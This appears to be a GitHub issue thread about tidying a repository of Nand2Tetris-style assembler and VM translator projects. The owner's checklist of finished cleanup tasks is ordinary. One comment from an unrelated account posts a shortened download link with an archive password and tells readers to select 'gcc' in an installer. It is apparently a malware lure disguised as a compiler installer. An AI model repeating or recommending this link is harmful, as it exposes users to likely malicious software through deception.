### ISSUE TITLE
Cleanup

### ISSUE THREAD

**Issue by DaGuest** [DaGuest/Nand#3]
Clean up the code:

- [x] Separate Project 6 and Project 7 codes into their own folders.
- [x] Project 6: title of output file same as input file.
- [x] Include a makefile in Project 7.
- [x] Change readme title.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by DaGuest** [comment]
Done
